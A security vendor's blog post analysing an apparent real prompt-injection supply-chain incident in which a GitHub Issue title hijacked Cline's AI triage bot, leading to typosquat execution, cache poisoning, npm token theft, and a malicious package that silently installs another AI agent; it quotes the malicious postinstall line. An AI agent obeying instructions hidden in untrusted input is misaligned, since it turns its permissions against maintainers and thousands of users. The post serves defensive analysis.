Back to Blog
Security Incidents

How a Single GitHub Issue Title Compromised 4,000 Developer Machines

A prompt injection in a GitHub Issue title hijacked Cline's AI triage bot, stole npm tokens, and silently installed a rogue AI agent on 4,000 developer machines. The era of AI-installing-AI supply chain attacks has arrived.

Ben Kim
Written by
Ben Kim
10 min read
Share:
How a Single GitHub Issue Title Compromised 4,000 Developer Machines

Key Takeaways

  • Attacker injected prompt injection into a GitHub Issue title to manipulate an AI triage bot (Feb 2026)
  • Stolen npm token used to publish malicious cline@2.3.0, downloaded 4,000 times in 8 hours
  • Malicious package auto-installed OpenClaw (an AI agent) — full system access without developer consent
  • npm audit, code review, and provenance attestation all failed to detect the attack
  • Security researcher reported vulnerability in Dec 2025 → Cline unresponsive for 5 weeks → patched within 30 minutes of public disclosure
  • Credential rotation error: wrong token deleted → attacker published malicious package with the still-valid token

What Happened: One Issue Title, 4,000 Compromised Machines

On a day in February 2026, approximately 4,000 developers ran npm install as they always do. Maybe a VS Code notification told them Cline had been updated. Maybe they were setting up a new project and pulling in dependencies. Either way, nothing looked unusual in their terminals.

But at that moment, an AI agent called OpenClaw was being silently installed on their machines. It registered itself as a system daemon that survived reboots, read credentials from ~/.openclaw/, and could receive remote commands via a Gateway API.

None of these developers had installed this program. None had consented to it, evaluated it, or even heard of it.

It all started with a single GitHub Issue title.

Cline is a popular VS Code extension that uses AI to write and edit code. Its GitHub repository had accumulated tens of thousands of stars, and its weekly npm downloads consistently ranked among the top in its category. To manage the flood of incoming Issues, the Cline team built an AI triage workflow powered by Anthropic's claude-code-action. When a new Issue was filed, the AI would read its contents, automatically apply labels, and sort it by priority.

It was convenient. It was efficient. And it was catastrophic.

The problem was in the workflow's configuration. The GitHub Actions workflow pulled the Issue title via ${{ github.event.issue.title }} and passed it directly to the AI. No input validation. No sanitization. Worse, the configuration set allowed_non_write_users: "*", meaning every GitHub user on the planet could trigger this AI workflow simply by opening an Issue.

The attacker created Issue #8904. The title looked like a performance benchmark report, but embedded within it were instructions designed to manipulate the AI. Claude interpreted them as a legitimate work request and faithfully executed the attacker's commands.

This was the moment natural language became the entry point for the first large-scale supply chain attack.

The 5-Step Attack Chain: From Natural Language to Mass Infection

5-Step Attack Chain Diagram
5-Step Attack Chain Diagram

Clinejection captured the security community's attention not simply because "an AI tool was breached," but because five distinct vulnerabilities were chained together into a single, complete attack.

Step 1: Prompt Injection — Attack Commands Disguised as a "Performance Report"

The Issue title the attacker crafted appeared to be a routine performance report request. But hidden within it were instructions the AI triage bot could interpret. Claude recognized them as a separate command, abandoned its triage task, and began following the attacker's instructions.

This is prompt injection — the technique of embedding malicious instructions in user input to manipulate AI behavior. It has been one of the hottest topics in AI security. But before Clinejection, there were virtually no cases where prompt injection had led to real, large-scale damage. The fact that a theoretical risk became reality for the first time makes this attack particularly significant.

Step 2: Arbitrary Code Execution — The Precision of Typosquatting

Following the injected commands, the AI ran npm install targeting glthub-actions/cline. Notice anything? The 'i' is missing from "github." The attacker had pre-created a fork with a name nearly identical to the original.

The typosquatted package's package.json contained a preinstall script. npm automatically runs this script before installing the package. The script downloaded and executed a shell script from a remote server. The AI was simply performing the "routine" action of installing a package, but that action gave the attacker a foothold for arbitrary code execution inside the CI/CD environment.

Step 3: Cache Poisoning — A Time-Delayed Attack Using 10GB of Junk

This is where the attack gets sophisticated. The remote shell script deployed Cacheract, a tool designed to attack GitHub Actions' caching system.

GitHub Actions caches dependencies like node_modules to speed up builds. Cache storage has limits, and when exceeded, the oldest entries are evicted using LRU (Least Recently Used). Cacheract exploited this mechanism in reverse. It flooded the cache with over 10GB of junk data, forcing out legitimate cache entries, then planted poisoned entries that matched the cache keys used by Cline's nightly release workflow.

This attack doesn't trigger immediately. It's a time-delayed attack that waits silently until Cline's nightly release runs. Because there's a gap between when the cache is poisoned and when the damage occurs, even real-time monitoring would struggle to connect cause and effect.

Step 4: Credential Theft — Three Keys to the Kingdom

The following night, Cline's nightly release workflow executed on schedule. It restored node_modules from cache — and the attacker's code was already embedded inside.

This workflow had access to three secrets needed for package deployment:

  • NPM_RELEASE_TOKEN — permission to publish packages to npm
  • VSCE_PAT — permission to publish extensions to VS Code Marketplace
  • OVSX_PAT — permission to publish extensions to OpenVSX

All three were exfiltrated to attacker infrastructure. The attacker now had complete authority to publish npm packages and VS Code extensions under Cline's name.

The critical issue here is that these were long-lived tokens. Once issued, they remain valid indefinitely until manually rotated. Had Cline used OIDC-based short-lived tokens, the workflow would have been issued temporary tokens valid only for that specific execution. Even if stolen, they couldn't be reused.

Step 5: Malicious Package Publication — The Power of One Line in package.json

Using the stolen npm token, the attacker published cline@2.3.0. The CLI binary was byte-identical to the previous version. The only change was a single line added to package.json:

"postinstall": "npm install -g openclaw@latest"

When npm install runs, postinstall scripts execute automatically. No confirmation is requested from the user. No special warning appears in the terminal. It simply runs as part of the dependency installation process.

This one line globally installed an AI agent called OpenClaw. The malicious package was publicly available on the npm registry for 8 hours, during which it was downloaded approximately 4,000 times. Eight hours. That's how long it took for security teams to detect the anomaly and unpublish the package. In those eight hours, 4,000 developer environments were compromised.

AI Installing AI — The New Grammar of Supply Chain Attacks

Confused Deputy Authority Delegation Diagram
Confused Deputy Authority Delegation Diagram

Supply chain attacks are nothing new. SolarWinds, Codecov, ua-parser-js, event-stream... But Clinejection introduced a fundamentally different pattern.

In previous supply chain attacks, malicious payloads were cryptominers, backdoors, or data exfiltration scripts. Detection tools are designed to identify these types of malicious code. But Clinejection's payload was legitimate software. OpenClaw is a properly registered npm package with no malware signatures. It is not malware by itself. It was simply "installed without consent."

This is the essence of the new threat Clinejection has created. A recursive supply chain attack where AI installs AI.

Security researchers have dubbed this "the supply chain's Confused Deputy Problem." The Confused Deputy Problem is a classic security issue arising from privilege delegation. A trusted program (the deputy) executes an attacker's request using its own privileges. In Clinejection, this problem manifested at the tool level.

A developer authorizes Cline to operate in their development environment. When Cline is compromised, that authority is delegated to OpenClaw. The developer never evaluated, never configured, and never consented to OpenClaw. Yet OpenClaw operates on the system using the privileges acquired through Cline.

Looking at what OpenClaw could do once installed reveals the severity of the problem. It could read credentials stored in ~/.openclaw/, receive and execute remote commands via a Gateway API, and register itself as a system daemon that persists across reboots. Endor Labs characterized the payload as "closer to proof-of-concept than weaponized," but the mechanism itself is immediately deployable in real-world attacks.

Comparing this with traditional supply chain attacks makes the evolution stark. Traditional attacks entered through malicious packages or typosquatting; humans or scripts were the execution agents; package scanners could detect them; payloads were backdoors or cryptominers; and they disappeared when the process was killed. Clinejection enters through natural language; an AI agent is the execution agent; the payload is a legitimate package that's undetectable; the payload is another AI agent; and it persists as a system daemon.

The implication for security leaders is clear. AI tool permission chains cannot be managed with traditional access control models. In an environment where AI can invoke and install other AI, you need a new governance model that explicitly limits the scope of authority at each step. You need to be able to answer the question: "What other tools can this AI tool install?"

Why Every Security Tool Failed

The most uncomfortable truth of this incident is that every security tool organizations typically depend on failed entirely.

npm audit checks packages for known vulnerabilities and malicious signatures. But OpenClaw is a legitimate package. It contains no malicious code, has no registered CVEs, and violates none of npm's security rules. From npm audit's perspective, npm install -g openclaw@latest is a perfectly normal package installation command. The context of "installing legitimate software without consent" is not something npm audit can understand.

Code review examines changes to identify malicious modifications. But the CLI binary in cline@2.3.0 was byte-identical to the previous version. Review processes focused on binary diffs would detect no changes whatsoever. The only modification was one line in package.json — a postinstall script addition. A review process that meticulously checked package.json scripts might have caught it, but in most organizations, changes to the scripts section of package.json are treated as routine modifications.

Provenance attestation verifies that packages were built in a trusted build environment. npm has supported OIDC-based provenance since 2023. Had this feature been enabled, publishing would have required cryptographic signatures from specific workflows, not just a token — blocking the attack entirely. But Cline hadn't adopted it. Anyone with a single long-lived token could publish packages under Cline's name.

Permission prompts ask users for consent before dangerous operations. But npm's postinstall scripts execute automatically during npm install. No prompt asks "This package wants to install a global package. Allow?" Dependency lifecycle scripts are effectively a zone where code execution without user consent is permitted.

Argus Secret Detection Dashboard
Argus Secret Detection Dashboard

All four security measures failed, yet any single one working properly could have prevented this attack. OIDC-based provenance attestation in particular would have stopped the entire attack chain at Step 5. Stolen tokens cannot pass provenance verification.

Five Weeks of Silence and a Botched Token Rotation

The incident response failures in Clinejection are as shocking as the technical attack chain itself.

Security researcher Adnan Khan discovered this vulnerability chain in December 2025. Following responsible disclosure practices, he filed a GitHub Security Advisory on January 1, 2026. And he waited.

One week. Two weeks. A month. Five weeks with no response from Cline. Multiple follow-up attempts were met with silence.

Khan made the decision to go public on February 9, publishing the vulnerability details. Cline patched within 30 minutes — removing the AI triage workflows and beginning credential rotation.

But here is where the second failure occurred.

On February 10, the Cline team performed credential rotation. The standard procedure: invalidate leaked tokens and issue new ones. Except they deleted the wrong tokens. They revoked the newly issued tokens while leaving the leaked originals still valid. The error wasn't discovered until February 11, when they re-rotated — but by then, the damage was done.

And here's one more shocking detail. The person who actually published cline@2.3.0 wasn't Khan. Khan was merely the security researcher who discovered and reported the vulnerability. A separate, unknown attacker found Khan's proof-of-concept on his test repository and weaponized it directly against Cline.

What this timeline reveals is clear. Vulnerability response is not merely a matter of technical capability — it's a matter of process. Five weeks of silence doesn't mean the absence of sophisticated security architecture; it means the absence of basic security communication systems. Deleting the wrong token means there was no credential rotation verification procedure. A PoC being weaponized by a third party represents a failure in disclosure window management.

Cline subsequently announced the following remediation measures: removing GitHub Actions cache usage from credential-handling workflows, adopting OIDC provenance attestation for npm publishing, adding verification requirements for credential rotation, establishing vulnerability disclosure processes with SLAs, and commissioning third-party security audits of CI/CD infrastructure. All correct measures, but bittersweet given that they represent basic security hygiene that should have been in place from the start.

Redrawing the Defense Line for the AI Agent Era

Clinejection is not one organization's mistake. It demonstrates that every organization integrating AI tools into CI/CD pipelines faces the same structural risk. Issue triage, automated code review, automated testing, PR summarization — every workflow where AI processes external input and executes code is a potential attack surface.

There are three areas security leaders should examine immediately.

First, credential management in CI/CD pipelines. The linchpin of Clinejection was long-lived tokens. Switching to OIDC-based short-lived tokens is the single most effective defensive measure. npm already supports OIDC provenance, and GitHub Actions natively provides OIDC token issuance. If you have workflows that trust code restored from cache, either add cache integrity verification or eliminate cache usage entirely from credential-handling workflows.

Second, AI tool governance. You need to know what AI tools are being used across your development organization. VS Code extensions, GitHub Actions bots, AI agents in CI/CD pipelines — you need to understand what permissions each has and what external inputs they process. When AI tools can execute shell commands or install packages, their scope of authority must be explicitly restricted. Check whether settings like allowed_non_write_users: "*" exist in your own workflows.

Third, incident response processes. You need a system that can respond within 48 hours when an external security researcher reports a vulnerability. You need procedures to verify that previous tokens are actually invalidated after credential rotation. The two response failures Cline experienced — five weeks of silence and deleting the wrong token — didn't stem from a lack of sophisticated security technology. They stemmed from the absence of basic processes.

Preparing for the AI Agent Era with Cremit

The core of the Clinejection attack was credential theft and exfiltration. NPM_RELEASE_TOKEN, VSCE_PAT, OVSX_PAT — if these three long-lived tokens hadn't been leaked, 4,000 developer machines would have been safe.

Cremit Argus Dashboard
Cremit Argus Dashboard

Cremit addresses the security challenge of the AI agent era at precisely this point.

Real-time Secret Detection. Cremit detects credential exposure across CI/CD pipelines, code repositories, logs, and configuration files in real time. When the Clinejection malware embedded in cache attempted to exfiltrate tokens to an external server, Cremit's detection would have caught the anomalous credential access pattern immediately. The moment a token is hardcoded in source, printed to logs, or transmitted over an unexpected network path, an alert fires.

NHI (Non-Human Identity) Management. Cremit provides complete visibility into non-human identities across your organization. API keys used by AI tools, service accounts in CI/CD pipelines, deployment tokens, OAuth secrets — see where each is used, how old it is, and whether it has excessive permissions, all at a glance. Had Cline known when NPM_RELEASE_TOKEN was last rotated and which workflows could access it, the window of exposure could have been dramatically reduced.

Automated Credential Lifecycle. Cremit automates the entire lifecycle of credentials — from issuance to rotation, expiration management, and unused credential cleanup. The manual rotation mistake Cline experienced — deleting the wrong token and leaving the leaked one valid — would not have occurred with automated lifecycle management.

AI coding tools are revolutionizing developer productivity. There's no reason to stop that momentum, and no way to. But new tools create new attack surfaces. Clinejection is just the beginning. Before the next attack targets your organization, start with the fundamentals of credential security.

Start securing credentials for the AI agent era with Cremit →

API KeysCloud SecurityNHI SecuritySupply Chain Attack

Enjoyed this post?

Share it with your network

Share:
How a Single GitHub Issue Title Compromised 4,000 Developer Machines | Cremit